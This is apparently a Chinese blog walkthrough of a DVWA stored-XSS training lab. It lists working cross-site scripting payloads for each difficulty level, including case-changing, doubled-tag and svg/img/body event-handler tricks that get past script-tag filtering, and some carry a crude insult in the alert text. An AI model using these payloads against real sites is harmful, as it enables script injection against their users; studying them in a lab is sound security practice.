「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》
XSS Stroed
这关是一个论坛功能,把用户提交的内容插入到页面进行展示。
一、Low级别
低级别中Message字段没有过滤,直接提交代码即可,payload:
<script>alert('就TM你叫韩毅啊')</script> 复制到Message的输入框中, Sign Guestbook
弹窗就代表通过
二、Medium级别
先清除历史记录,防止之前提交的内容影响接下来的关卡。
使用大小写绕过,payload:
<Script>alert(1)</Script> 
双写绕过也可以,payload:
<scr<script>ipt>alert('就TM你叫韩毅啊')</Script> 三、Hign级别
只过滤了<script,使用替代标签绕过即可,payload:
<svg onload=alert('就TM你叫韩毅啊')> <img src=1 onerror=alert('就TM你叫韩毅啊')> <body onload=alert('就TM你叫韩毅啊')>
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/bian-cheng-ji-chu/79988.html